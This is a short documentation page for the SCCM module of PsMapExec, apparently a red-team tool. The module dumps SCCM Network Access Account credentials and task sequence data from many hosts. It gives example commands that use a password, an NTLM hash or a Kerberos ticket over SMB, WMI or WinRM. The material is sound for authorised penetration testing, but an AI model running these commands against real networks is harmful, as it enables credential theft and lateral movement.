SCCM

Dumps local SCCM secrets for Network Access Account credentials and Task sequence data. Collected information is automatically parsed and organized where it will be stored in $PWD\PME\SCCM\.

Uses a stripped down and revised version of SharpSCCM for execution.

Supported Methods

  • SMB

  • SessionHunter (WMI)

  • WMI

  • WinRM

Optional Parameters

Usage Examples

# SMB execution with password authentication, targeting workstations
PsMapExec -Targets "Workstations" Method "SMB" -Username [User] -Password [Pass]     -Module SCCM

# WinRM execution with hash authentication, targeting servers
PsMapExec -Targets "Servers" -Username [User] -Hash [RC4/AES256/NTLM] -Module SCCM -Method "WinRM"

# WMI execution with Kerberos ticket authentication (Username not required)
PsMapExec -Targets "All" -Method "WMI" -Ticket [doI..] -Module SCCM

Last updated